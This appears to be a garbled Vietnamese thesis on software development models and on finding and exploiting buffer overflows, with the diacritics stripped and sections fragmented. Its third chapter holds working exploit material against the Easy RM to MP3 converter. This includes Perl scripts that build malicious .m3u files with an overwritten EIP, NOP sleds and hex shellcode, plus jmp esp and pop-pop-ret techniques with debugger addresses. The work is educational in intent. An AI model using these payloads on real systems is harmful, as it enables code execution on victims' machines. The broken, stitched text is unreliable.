Professional Documents
Culture Documents
1.1.1.
1.1.2.
1.2.
1.2.1.
1.2.2.
1.3.
1.3.1.
M hnh Waterfall 11
1.3.2.
M hnh ch V.. 13
1.3.3.
M hnh mu. 15
1.3.4.
1.3.5.
1.3.6.
1.3.7.
M hnh xon. 20
Kt lun chng I. 22
CHNG II. LI BO MT PHN MM, MT S LI BO MT PHN MM PH BIN
2.1.
2.1.1.
2.1.2.
2.2.
2.2.1.
23
2.2.2.
2.3.
2.4.
LI DOUBLE FREE.. 34
TM V PHT HIN LI 37
3.1.1.
3.1.2.
3.1.3.
Vai tr l hacker. 40
3.2.
CC BC KHAI THC LI 42
3.2.1.
3.2.2.
3.2.3.
3.2.4.
3.2.5.
3.3.
3.3.1.
3.3.2.
pop return. 59
3.3.3.
Push return. 64
3.3.4.
3.3.5.
blind return. 67
3.3.6.
3.3.7.
3.3.8.
Mt s k thut khc. 74
3.4.
SHELLCODE BACKDOOR.. 78
2.
3.
PH LC 3. 89
4.
5.
DANH MC CC T VIT TT
K hiu Thut ng
ngha
SEP
ID
Identifier
nh danh
CSDL
C s d liu
C s d liu
SRS
Bn c t yu cu phn mm
GUI
RUP
RAD
OS
Operating system
H iu hnh
LIFO
vo sau ra trc
ESP
EBP
Con tr c s m rng
EIP
NOP
No Operation Performed
DLL
Th vin lin kt ng
CPU
B x l trung tm
SEH
X l cu trc ngoi l
DANH MC CC BNG
Bng 1.
Bng 2.
Bng 3.
Bng 4.
Bng lit k cc hm gy li
Bng cc cu trc gy li
Bng cc testcase
Bng opcode ca cc lnh nhy v c
DANH MC CC HNH V
Hnh 1.1
M hnh Waterfall
Hnh 1.2
M hnh ch V
Hnh 1.3
M hnh Prototype
Hnh 1.4
M hnh tin ha
Hnh 1.5
M hnh lp v tng dn
Hnh 1.6
Hnh 1.7
M hnh xon
Hnh 2.1
Stack
Hnh 2.2
Push
Hnh 2.3
Pop
Hnh 2.4
Peek
Hnh 2.5
Stack frame c to
Hnh 2.6
Hnh 2.7
Hnh 2.8
Hnh 2.9
ESP tr n 0022FF5C
Hnh 2.10
Hnh 2.11
Hnh 2.12
Hnh 2.13
ESP tr v u chui
Hnh 2.14
Hnh 3.1
Hnh 3.2
Hnh 3.3
ng dng b crash
Hnh 3.4
Hnh 3.5
Hnh 3.6
Hnh 3.7
Hnh 3.8
ni dung ESP
Hnh 3.9
Hnh 3.10
Hnh 3.11
ESP lu a ch 000ff730
Hnh 3.12
Hnh 3.13
ESP bt u t k t th 5
Hnh 3.14
Hnh 3.15
Hnh 3.16
Hnh 3.17
Hnh 3.18
Hnh 3.19
Hnh 3.20
Hnh 3.21
Mt vi opcode
Hnh 3.22
Hnh 3.23
Hnh 3.24
phn b nh ln vi A
Hnh 3.25
000ff849 l mt phn mu
Hnh 3.26
Hnh ph lc
LI NI U
Ngy nay, s pht trin ca cng ngh thng tin ngy cng chim mt v tr quan trng trong mi lnh
vc ca cuc sng. S bng n ca khoa hc cng ngh ni chung v cng ngh thng tin ni ring
em li rt nhiu li ch cho con ngi, rt ngn khong cch v a l, tng hiu sut, tit kim thi
gian v chi ph cho cng vic
Khi m cng ngh thng tin pht trin mnh m nh ngy nay, th my tnh l mt vt dng thit yu
i vi mi ngi. T mi lnh vc trong cuc sng cho ti mi ngnh ngh u lin quan ti my tnh.
Mi ngi lm vic vi my tnh chnh l lm vic vi phn mm. Phn mm tr thnh mt phn tt
yu trong cng vic ca mi ngi khi lm vic vi my tnh. Vi s pht trin mnh m ca cng
ngh phn mm to ra v vn cc sn phm, cng c phn mm phc v cho mi nhu cu ca con
ngi. Phn mm em li nhng li ch v cng to ln cho con ngi, n gii quyt nhiu bi
ton m trc kia con ngi khng th thc hin c. Song bn cnh nhng li ch to ln phn
mm cng mang li khng t nhng nguy c ri ro. Cc ri ro ny ti t vic xut hin l hng bo
mt trn nhng phn mm c s dng.
Vy nhng l hng bo mt ny l g? Ti sao chng li xut hin? Cch th khai thc chng ra sao?
y l nhng cu hi m nhiu ngi ang tm hiu. Vic tm hiu v l hng bo mt phn mm l
mt vn v cng quan trng v chim khng t cng sc ca cc nh pht trin phn mm trn th
gii.
ti n tt nghip Nghin cu cc k thut tm v khai thc l hng bo mt phn mm
c b cc gm 3 chng:
Chng I. Tng quan qui trnh pht trin phn mm
Nu l thuyt chung v phn mm
Cc qui trnh pht trin phn mm
Chng II. Cc li bo mt phn mm ph bin
Nu khi nim v li phn mm, li bo mt phn mm
Phn mm thc hin cc chc nng ca n bng cch gi cc ch th trc tip n phn cng hoc
bng cch cung cp d liu phc v cc chng trnh hay phn mm khc.
Phn mm l mt khi nim tru tng, n khng th s hay ng vo, n cn c phn cng thc
thi.
1.1.2. Qui trnh pht trin phn mm
Qui trnh c th hiu l phng php thc hin hoc sn xut ra sn phm. Tng t nh vy, Qui
trnh pht trin phn mm chnh l phng php pht trin hay sn xut ra sn phm phn mm.
Thng thng mt qui trnh bao gm nhng yu t c bn sau:
Th tc (Procedures)
Biu mu (Forms/templates)
Cng c h tr (Tools)
Vi cc nhm cng vic chnh:
c t sn phm: Ti liu m t chi tit v phn mm, nhm phc v cho thit k phn mm.
K hoch lm vic: Ti liu m t chi tit cc cng vic cn lm trong qu trnh pht trin phn
mm
Ti liu thit k phn mm: Bao gm cc ti liu v cu trc phn mm, Biu lung d liu,
Ti liu kim th: Ti liu chi tit cho qu trnh kim th. Bao gm cc ti liu sau:
K hoch kim th (Test plan)
1.3.
vic lp k hoch kim th ton h thng c th c thc hin song song vi cc hot ng phn tch
v thit k h thng.
u im: Cc hot ng kim th c ch trng v thc hin song song vi cc hot ng lin quan
n c t yu cu v thit k. Hay ni cch khc, m hnh ny khuyn khch cc hot ng lin quan
n k hoch kim th c tin hnh sm trong chu k pht trin, khng phi i n lc kt thc
giai on hin thc.
Nhc im: Ging m hnh waterfall
ng dng: Tham kho m hnh waterfall.
1.3.3. M hnh mu
S khc nhau gia hai m hnh tng dn v lp c th c hiu n gin nh sau (so vi sn
M hnh tng dn (Incremental): thm chc nng vo sn phm (xem minh ho Hnh 6).
Process).
Nhc im: Kh c s nht qun gia nhng thnh phn c pht trin bi cc nhm khc nhau.
Khng ph hp cho nhng ng dng i hi hiu sut v thng ph thuc vo s h tr ca mi
trng pht trin v ngn ng cp cao.
ng dng: H thng qun l thng tin kiu nhng ng dng da trn GUI v CSDL. C s h tr ca
cng c hay s dng ngn ng cp cao. H thng khng yu cu kht khe v hiu sut.
1.3.7. M hnh xon
M hnh ny c xy dng bi Barry Boehm, t trng tm phn tch ri ro v xem xt k hoch
gii quyt chng, thng qua nhiu chu k con ni tip c lp lin tip da trn bn cht ca m
hnh lp.Trong m hnh ny, vic phn tch v gii quyt nhng vn c ri ro cao tp trung vo
thit k tng kha cnh c th ch khng da vo vic x l cc vn mt cch chung chung.
k lp tip theo.
u im: Phn tch nh gi ri ro c y ln nh mt phn thit yu trong mi ng xon c
tng mc tin cy ca d n.
Kt hp nhng tnh cht tt nht ca m hnh waterfall v tin ha.
Cho php thay i ty theo iu kin thc t d n ti mi ng xon c.
y chnh l m hnh tng qut nht, tt c cc m hnh khc u c th xem l mt hin thc ca
m hnh tng qut ny, hay cng c th xem n l m hnh tng hp cc m hnh khc. c bit, n
c ng dng khng ch trong pht trin phn mm m cn trong pht trin phn cng.
Nhc im: Phc tp v khng ph hp cho d n nh vi t ri ro. Cn c k nng tt v phn tch
ri ro.
ng dng: D n ln c nhiu ri ro hay s thnh cng ca d n khng c c s m bo nht
nh; nhng d n i hi nhiu tnh ton, x l nh h thng h tr quyt nh. i ng thc hin d
n c kh nng phn tch ri ro.
Kt lun chng I
Chng I trnh khi nim phn mm, qui trnh pht trin phn mm; cc yu c bn ca
mt qui trnh pht trin phn mm; cc ti liu ca qu trnh pht trin phn mm, cc thnh phn
to nn mt sn phm phn mm; Tm hiu v cc m hnh pht trin phn mm cng nh u im,
nhc im, v ng dng ca chng trong vic pht trin phn mm.
Qua chng ny chng ta c ci nhn tng quan ban u v phn mm v vic pht trin mt sn
phm phn mm. Sang chng tip theo chng ta s tm hiu v li bo mt phn mm v mt s li
bo mt phn mm ph bin.
{
do_something(argv[1]);
}
ng dng ly 1 agrument (tham s) ( argv[1] v truyn n vo hm do_something) Trong hm ny,
agrument s c copy ti bin cc b c di ti a 128bytes. Vy nu agrument di hn 127bytes
( 1 Null byte ngt xu) b m c th b trn.
Khi hm do_something() c gi t trong hm main(), c nhng iu sau xy ra:
Mt stack frame c to ra, nh ca stack cha parent stack. Con tr stack stack pointer
(ESP) tr vo a ch cao nht ca stack mi c to. y l nh ca stack.
Tip theo, hm prolog thc thi. V c bn, thanh ghi c s frame pointer (EBP) c t vo stack.
V vy n c th c phc hi khi hm tr v. Lnh lu frame pointer l push ebp . ESP li gim
4bytes ln na.
PUSH EBP
00401291 |. 89E5
MOV EBP,ESP
0040129C |. 894424 04
;|
;|
004012A9 |. E8 72050000
CALL
004012AE |. C9
LEAVE
004012AF \. C3
RETN
;|
;|
; \strcpy
C th thy r chc nng prolog: PUSH EBP v MOV EBP,ESP. Tip theo bn s thy cp pht khong
trng cho bin Myvar: SUB ESP,98. V bn s thy mt s hm MOV v LEA ( c bn l thit lp cc
tham s cho li gi hm strcpy). C th gii thch l: t con tr v argv[1] ( chnh l EBP+8 sao
chp n vo EAX), sau sao chp EAX vo bin Myvar ( c v tr l ESP+4).
C th nh sau:
PUSH EBP: Tin hnh lu EBP ri MOV EBP,ESP: ESP v EBP cng tr ti nh stack, l EBP va c
push vo.
SUB ESP,98: Tin hnh cp pht mt khong nh l 152bytes ( 98 hexa to decima).
MOV EAX,DWORD PTR SS:[EBP+8] : EBP cng 8 chnh l ptr to argv[1]. Bc ny sao chp a ch tr
ti argv[1] vo EAX. Lu rng a ch c di bng 1 thanh ghi 32bit tc 4bytes.
MOV DWORD PTR SS:[ESP+4],EAX: Sao chp EAX ( tc a ch argv[1] ti ESP cng 4. Nh rng sau
khi SUB ESP,98, ESP c gim i, nh stack ( nh hnh trn) ch khng cn cng tr vo EBP na.
ESP cng 4 l t nh gim xung 4 ( stack pht trin t cao xung thp). Lc ny, 4bytes trn nh
stack cha a ch argv[1].
LEA EAX,DWORD PTR SS:[EBP-88] : Lnh ny s lu a ch nh EBP tr 88 vo EAX:
MOV DWORD PTR SS:[ESP],EAX: a ch ny sau c ghi vo ESP. ESP lc ny tr vo EBP tr 88,
tc bt u ca ni strcpy() lu gi tr ca argv[1].
; \strcpy
Sau khi thc hin xong, tin hnh LEAVE ly li EBP lu, RET ly li EIP lu, chuyn v hm
main.
Nu nh khng c hm strcpy() trong hm ny, hm s kt thc v bung ra stack. C bn l, n s
di chuyn ESP li ESP lu, sau thc hin lnh RET. RET trong trng hp ny s ly con tr ESP
t stack v nhy n . Sau , n s quay li tr li chng trnh chnh, ni m hm
do_something() c gi. Hng dn epilog c thc hin bi lnh LEAVE, m s hi phc
framepointer v EIP. Trong v d ca chng ta, c hm strcpy()
Hm ny s c d liu, t a ch tr bi [Buffer], v lu tr n (trong s trn), c tt c d liu
cho ti khi gp null byte (string terminator k t kt thc). Trong khi sao chp d liu, ESP ni n
tr ti. Strcpy() khng s dng PUSH a d liu vo stack, n s c 1 bytes v a vo stack, s
dng index ch lnh ( nh ESP, ESP+1, ESP+2). Sau khi copy, ESP tr v u chui.
Heap c s dng cho vic cp pht b nh ng. Trong ngn ng lp trnh C [7]th vic cp pht v
gii phng c thc hin qua hai hm malloc() v free(). Khi chng trnh c np trong b nh th
phn on heap s nm trc phn on stack[8].
Bi v Heap c s dng lu tr d liu, khng c s dng lu cc gi tr a ch tr v ca
hm nh l Stack nn vic khai thc li trn b m trn Heap kh khn hn nhiu so vi vic khai
thc li trn b m trn Stack
Tuy nhin vn c th khai thc thnh cng li trn b m trn heap bng hai cch sau:
Sa d liu: K tn cng c th khai thc l hng bng cch ghi d liu quan trng. iu ny c
th l sp chng trnh hoc lm thay i gi tr c th c khai thc sau ny (nh ghi ln mt
ID ngi dng gn thm quyn truy cp).
Sa i tng: Trong nhiu ngn ng lp trnh nh C++ v Objective-C, cc i tng c t trn
Heap bao gm cc bng con tr hm v d liu. Do k tn cng c kh nng thay th d liu khc
hay thm ch thay th c cc instance methods[9] trong lp i tng
2.4.
LI DOUBLE FREE
Kt lun chng II
Chng II trnh by khi nim li phn mm v li bo mt phn mm.Trong chng ny chng ta
i tm hiu mt s li bo mt phn mm ph bin l: Li trn b m trn stack, Li trn b m
trn heap, Li double free.
Chng ta tp chung ch yu vo vic phn tch li trn b m trn stack, y l li ph bin nht v
cng d khai thc nht hin nay. iu quan trng nht trong li ny l vic ghi c ln EIP t
c th iu khin c lung d liu, l vic tr ti on m ca chng ta cn
thc thi.Sang chng tip theo chng ta s i nghin cu cch tm ra li v cc bc khai thc li
ny.
TM V PHT HIN LI
HM NN DNG
Strcat
Strlcat
Strcpy
Strlcpy
Strncat
Strlcat
Strncpy
Strlcpy
Sprintf
Vsprintf
Gets
fgets
NN DNG
#define BUF_SIZE 1024
char buf[1024];
char buf[BUF_SIZE];
char buf[1024];
char buf[1024];
Vic s dng hm sizeof() tnh ton kch thc ca b m s gip trnh c li hn khi m ch
trc tip. Nu kch thc ban u ca b m thay i th hm kim tra b m bn tri s khng
dng c v n s gy li nu s dng.
Mt ch na l vic s dng s nguyn c du.
0x7fffffff= 2147483647 Nhng
0x80000000 = -2147483648
iu ny s gy ra vic
int 2147483647 + 1 = 2147483648
3.1.2. Vai tr l ngi kim th
i vi nhng ngi kim th tm li phn mm h da vo test case. Test case l cc trng hp
c t ra i vi phn mm m ngi kim th c th th trc tip trn phn mm.
Ty thuc vo tng phn mm khc nhau m ngi kim th s dng cc test case khc nhau. Nhng
tng quan h u kim tra bng cch nhp vo u vo ca phn mm cc gi tr khc nhau v nh
gi cc kt qu nhn c u ra. H xem cc kt qu u ra c phi l kt qu mong mun hay
khng
Mt v d c th l vic tm li ca mt khung ng nhp vi u vo gm hai trng l tn ng nhp
v mt khu
Trong v d ny ngi kim th s phi truyn vo hai trng cc gi tr khc nhau v nhn li cc kt
qu. C th l :
STT
Tn ng nhp
Mt khu
Kt qu mong i
Tt c cc trng hp
Khng truyn gi tr no
ng nhp tht bi
Khng truyn gi tr no
Tt c cc trng hp
ng nhp tht bi
L s
Tt c cc trng hp
ng nhp tht bi
C k t c bit
Tt c cc trng hp
ng nhp tht bi
C trong CSDL
Mt khu khp
C trong CSDL
ng nhp tht bi
Tt c cc trng hp
ng nhp tht bi
V vy, nu chng ta lm cho ng dng chy shellcode ca chng ta, chng ta c th goi n l mt
exploit. Trong hu ht trng hp, con tr ny c tham chiu bi thanh ghi EIP. Thanh ghi c di
4 bytes. Cho nn nu bn c th thay i 4 bytes ny, bn s lm ch c ng dng v computer
chy ng dng .
3.2.
CC BC KHAI THC LI
Trong phn ny chng ta s ch yu tm hiu cc bc khai thc li trn b m trn stack. Thng
thng c 5 bc thc hin vic khai thc l hng bo mt phn mm ny. Sau y l chi tit tng
bc
3.2.1. Mc chng trnh ti debugger[13]
thy c trng thi ca stack ( v gi tr ca thanh ghi, nh con tr stack, con tr lnh..) chng
ta cn phi mc mt debugger ti ng dng, chng ta c th thy nhng g xy ra trong thi gian ng
dng chy ( v c bit khi n cht). C nhiu trnh debug cho mc ch ny, trong l Windbg, v
Immunitys Debugger.
By gi chng ta s bt u vi v d phn tm li trn b m trn stack:
Chy Easy RM to MP3 v m file crash.m3u mt ln na. ng dng s sp mt ln na. Lc ny
ng dng debugger s chy.
Hnh 3.7: Ni dung ca Buffer sau khi thc Easy RM to MP3 chy
my $file= crash25000.m3u;
my $junk = \x41 x 25000;
my $junk2 = put the 5000 characters here
open($FILE,>$file);
print $FILE $junk.$junk2;
close($FILE);
print m3u File Created successfully\n;
To file .m3u, v m bng Easy RM to MP3. i cho ng dng cht v ch n ni dung ca EIP:
close($FILE);
print m3u File Created successfully\n;
To file v m, quan st ESP:
Chng ta cn:
Mt shellcode thc s
0x000ff730
By gi chng ta s lm trng hp n gin. Ghi EIP vi 000ff730, ri 25NOP[14] (\x90), ri
break (/xcc), ri 25NOP. Nu thnh cng, EIP s nhy n 0x000ff730, chy NOP cho n khi gp
break.
my $file= test1.m3u;
my $junk= A x 26094;
my $eip = pack(V,0x000ff730);
my $shellcode = \x90 x 25;
$shellcode = $shellcode.\xcc;
$shellcode = $shellcode.\x90 x 25;
open($FILE,>$file);
print $FILE $junk.$eip.$shellcode;
close($FILE);
print m3u File Created successfully\n;
ng dng sp . Khi nhn vo EIP, tr n 0x000ff730. Khi dump ESP, chng ta khng nhn thy ci
chng ta mong i.
Jumming to ESP l k thut rt ph bin trong ng dng windows. Thc t ng dng windows s dng
mt hoc nhiu file dll, v cc dll ny cha rt nhiu m lnh. Hn na, a ch s dng bi dll l a
ch tnh. Cho nn nu tm c dll cha m lnh nhy n esp, chng ta c th ghi a ch EIP bng
a ch lnh .
Trc tin, chng ta cn tm nhng opcode[15] cho jmp esp
Bn c th lm vic bng cch m Easy RM to MP3, ri m windbg, v hook (mc) windbg ti Easy
RM to MP3. Khng lm bt k iu g vi Easy RM to MP3. iu ny gip windbg cho ta thy Easy RM
to MP3 np nhng module , nhng dll no.
C:\WINDOWS\system32\ole32.dll
Converter\MSRMfilter03.dll
ModLoad: 71ab0000 71ac7000
C:\WINDOWS\system32\WS2_32.dll
C:\WINDOWS\system32\WS2HELP.dll
Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000
Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000
Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000
Converter\MSRMCcodec02.dll
ModLoad: 01fe0000 01ff1000
ModLoad: 77120000 771ab000
C:\WINDOWS\system32\MSVCIRT.dll
C:\WINDOWS\system32\OLEAUT32.dll
open($FILE,>$file);
\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96 .
\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b .
\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a .
\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83 .
\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98 .
\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61 .
\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05 .
\x7f\xe8\x7b\xca;
open($FILE,>$file);
print $FILE $junk.$eip.$shellcode;
close($FILE);
print m3u File Created successfully\n;
u tin, tt autopopup trong registry. To file m3u v m bng ng dng:
Chng ta c exploit u tin.
Vic nhy ti shellcode l vic quan trng nht trong qu trnh khai thc li phn mm. N l yu t
quyt nh n s thnh cng ca vic khai thc li bo mt phn mm. C rt nhiu cch nhy ti
shellcode, ty tng trng hp c th m la chn cch thc hin hp l. Trong phn ny chng ta s
i tm hiu tng cch thc nhy ti shellcode mt
3.3.1. jump (hoc call)
Jump ( hoc call) thanh ghi tr trc tip n shellcode. Vi k thut ny, c bn l bn s s dng mt
thanh ghi c cha a ch tr ti ni cha shellcode v t a ch ny vo trong EIP. Bn s c gng
tm opcode ca jump hoc call ti thanh ghi c trong cc dll file ca ng dng ang chy. Khi bn
to ra payload, thay v ghi EIP ti mt a ch trong b nh, bn s ghi a ch cha lnh jum to
register. ng nhin, phng php ny ch hot ng tt khi m thanh ghi cha a ch tr ti
shellcode. y l cch m chng ta s dng trong phn trn.
Nu mt thanh ghi cha mt a ch tr trc tip ti shellcode, bn c th s dng call [reg] hoc
jump trc tip n shellcode. Ni cch khc, nu ESP tr trc tip vo shellcode ( nn bytes u tin
ca shellcode l bytes u tin ca ESP) bn c th ghi EIP vi a ch cha lnh call esp, v
shellcode s c thc thi. iu ny lm vic vi tt c thanh ghi v th vin kernel32.dll cha rt
nhiu a ch cha call [reg].
V d : gi s ESP tr trc tip n shellcode, u tin hy tm mt opcode c cha call esp. Chng
ta s s dng findjmp:
findjmp.exe kernel32.dll esp
call esp
0x7C874413
jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses
Tip theo, chng ta s ghi EIP vi a ch 0x7C836A08.
Trong v d trc, vi Easy RM to MP3, chng ta bit rng c th tr ESP ti shellcode bng cch thm
4 k t gia EIP v ESP, exploit s nh sau:
my $file= test1.m3u;
my $junk= A x 26094;
my $eip = pack(V,0x7C836A08);
my $prependesp = XXXX;
my $shellcode = \x90 x 25;
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a .
\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47 .
\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c .
\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a .
\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50 .
\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43 .
\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a .
\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c .
\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44 .
\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .
\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47 .
\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50 .
\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44 .
\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43 .
\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42 .
\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b .
\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45 .
\x31\x42\x4c\x42\x43\x45\x50\x41\x41;
open($FILE,>$file);
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print m3u File Created successfully\n;
3.3.2. pop return
nu khng c mt thanh ghi no tr trc tip ti a ch, nhng bn c th thy mt a ch trong
stack ( c th nm u tin, th hai) tr ti shellcode, bn c th ti vo trong EIP, nu u tin
l pop ret[17], hoc pop pop ret nu th hai, hoc pop pop pop pop ret ph thuc vo v tr nm trong
stack.
Trong v d Easy RM to MP3, chng ta hon ton c th tinh chnh ESP tr trc tip ti shellcode.
Vy s nh th no nu khng c thanh ghi no tr ti shellcode.
Vng, trong trng hp ny, a ch tr ti shellcode c th nm trn stack. Nu bn dump esp, nhn
vo cc a ch u tin. Nu mt trong cc a ch ny tr ti shellcode ( hoc buffer bn iu khin
c), tip theo bn c th tm c pop ret hoc pop pop ret :
Ly a ch trong stack
Nhy n a ch m n a bn ti shellcode
K thut pop ret ch c tc dng khi ESP+offset cha a ch tr ti shellcode. V vy, khi dump ESP,
nu mt trong cc a ch u tin tr ti shellcode, v t mt tham chiu ti pop ret ( hoc pop pop
ret) trong EIP. iu ny lm mt mt s a ch trong stack ( mt a ch cho mt ln pop) v a a
ch tip theo vo EIP. Nu mt trong s tr ti shellcode, bn s thnh cng.
Trng hp th hai s dng pop ret: Khi bn kim sot c EIP, khng c thanh ghi no tr ti
shellcode, nhng shellcode ca bn c thy ESP+8. Trong trng hp ny, bn c th t pop pop
ret vo EIP, s nhy ti ESP+8.
Hy xy dng mt th nghim. Chng ta c 26094 bytes trc khi ghi EIP, v cn 4bytes trc khi
ti v tr ESP tr ti (trong trng hp ca ti, y l 0x000ff730).
Chng ta s m phng ti ESP+8, c mt a ch tr ti shellcode ( thc t l s t shellcode ngay
sau , y ch l th nghim). 26094 A, tip theo l XXXX ( kt thc l ni ESP tr ti), break, tip
n l 7 NOP, break, v nhiu NOP na. Gi s shellcode bt u t break th hai. Mc ch l nhy t
break u tin ti ti break th hai, ESP+8 0x000ff738.
my $file= test1.m3u;
my $junk= A x 26094;
my $eip = BBBB;
my $prependesp = XXXX;
my $shellcode = \xcc;
$shellcode = $shellcode . \x90 x 7
$shellcode = $shellcode . \xcc;
$shellcode = $shellcode . \x90 x 500;
open($FILE,>$file);
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print m3u File Created successfully\n;
Nhn vo stack, ng dng b crash bi buffer overflow. EIP b ghi bi BBBB. ESP tr ti 000ff730,
bt u vi break u tin, tip n l 7 NOP, chng ta s thy break th hai, ni thc s bt u ca
shellcode ( ti a ch 0x000ff738).
Mc ch l ly gi tr trong ESP+8 vo EIP, v lm cho nhy n shellcode. Chng ta s s dng k
thut pop ret v a ch ca jmp esp hon thnh.
Mt lnh pop s ly 4bytes trong stack, khi ESP tr ti 000ff734. Chy mt lnh pop na, s ly
tip 4bytes na, ESP tr ti 000ff738. Khi lnh ret c thc thi, gi tr hin ti ca ESP s c a
vo EIP. Cho nn gi tr ti 000ff738 cha a ch ca lnh jmp esp, th l nhng g EIP s lm.
Buffer sau 000ff738 cha shellcode ca chng ta.
Chng ta cn tm pop,pop,ret trong mt ni no , v ghi EIP bng a ch lnh u tin trong
chui lnh . V chng ta phi thip lp ESP+8 tr n a ch ca jmp esp, theo sau l shellcode ca
chng ta.
Trc tin chng ta phi bit opcode ca pop pop ret. Chng ta s s dng chc nng assembly trong
windbg thc hin:
0:000> a
7c90120e pop eax
pop eax
7c90120f pop ebp
pop ebp
7c901210 ret
ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e 58
pop
eax
7c90120f 5d
pop
ebp
7c901210 c3
ret
7c901211 ffcc
dec
7c901213 c3
ret
7c901214 8bff
mov
7c901216 8b442404
esp
mov
edi,edi
eax,dword ptr [esp+4]
7c90121a cc
int
26094 As
EIP
8 bytes offset
JMP ESP
(=POPPOPRET)
Tin trnh exploit nh sau:
EIP b ghi bi POP POP RET, ESP tr ti byte u tin trong 8 bytes offset.
POP POP RET c thc thi. EIP ly a ch 0x01ccf23a ti ESP+8, ESP tr ti shellcode.
EIP b ghi a ch ti jmp esp, ln nhy th hai c thc hin v shellcode c chy.
0:000> u 000ff7ae
<Unloaded_P32.dll>+0xff79d:
000ff7ae 54
000ff7af c3
push
esp
ret
open($FILE,>$file);
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print m3u File Created successfully\n;
Tm c opcode ca esp+8h.
Tm c a ch tr ti lnh ny.
0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408
jmp
Opcode l ff642408
By gi bn cn tm kim nhng dll c opcode ny, v s dng a ch ghi EIP. Nhng ti khng
th tm c opcode ny bt k u. ng nhin, khng gii hn vic tm kim phi l esp+8, c
th l ln hn 8, khi ta s thm mt s NOP cho ph hp.
3.3.5. blind return
Trong nhng phn vit trc, ESP tr n v tr nh stack hin hnh. Mt lnh RET khi thc thi s thc
hin lnh pop gi tr cui cng ( 4bytes) t stack v t a ch vo EIP. Vy nu bn ghi EIP
bng mt a ch thc hnh lnh RET, bn s mang c a ch trong ESP vo EIP. Nu bn phi i
mt vi trng hp khng gian b nh c sn trong buffer b gii hn sau khi EIP b ghi ln, nhng
li c rt nhiu khng gian trc khi ghi ESP, bn c th s dng lnh jump phn buffer nh
nhy v u buffer, ni cha main shellcode.
K thut ny gm 2 bc sau:
Khi lnh RET c thc thi, s ly 4bytes ny ( lc ny ang nh stack) ghi vo EIP.
Bn khng th tr EIP ti mt thanh ghi ( v khng tm c lnh jump hay call no).
Bn iu kin c ESP.
RET. Nh rng trong phn 1, ESP tr ti 0x000ff730, ng nhin a ch ny thay i theo tng h
iu hnh, nhng khng c cch no khc ngoi t cng a ch. Buffer s trng nh sau:
[26094 As][address of ret][0x000fff730][shellcode]
3.3.6. Dealing with small buffers
(jumping anywhere with custom jumpcode)
Chng ta ni v cch lm cho EIP nhy ti shellcode ca chng ta. R rng l chng ta thoi
mi t shellcode trong buffer ( phn sau EIP). Nhng nu chng ta khng c ln t
shellcode vo th sao?
Trong v d, chng ta s dng 26094 A ghi ln EIP, v chng ti thy rng ESP tr ti
26094+4bytes, c rt nhiu khng gian pha trc. Nhng nu chng ta ch c 50bytes pha sau.
50bytes lu tr shellcode l khng . V vy, chng ta phi tm xung quanh, v s dng 26094 khi
kch hot trn b nh m.
u tin, chng ta cn tm 26094 bytes ny u trong b nh. Nu khng tm thy n u, rt
kh tham chiu ti. Thc t nu tm thy trong b nh, v mt thanh ghi no tr n th iu
tr nn qu d dng.
Th kim tra Easy RM to MP3, bn c th thy rng 26094 bytes c th thy trong ESP dump:
my $file= test1.m3u;
my $junk= A x 26094;
my $eip = BBBB;
my $preshellcode = X x 54
my $nop = \x90 x 230;
open($FILE,>$file);
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
print m3u File Created successfully\n;
M file test1.m3u chng ta thy 50 X trong ESP. Gi s l khng gian dnh cho shellcode. Tuy
nhin, nhn xung di, chng ta thy rng A bt u ti a ch 000ff849 (=ESP+281).
Khi nhn vo cc thanh ghi khc, chng ta khng thy du vt no ca X v A. V vy, y chnh l n.
Chng ta c th ngy ti ESP thc thi shellcode, nhng chng ta ch c 50bytes. Chng ta s s
dng phn b nh khc trong buffer ca chng ta v tr thp hn, thc t chng ta s nhy ti phn
ni dung ca ESP, s c phn b nh ln vi A.
my $eip = BBBB;
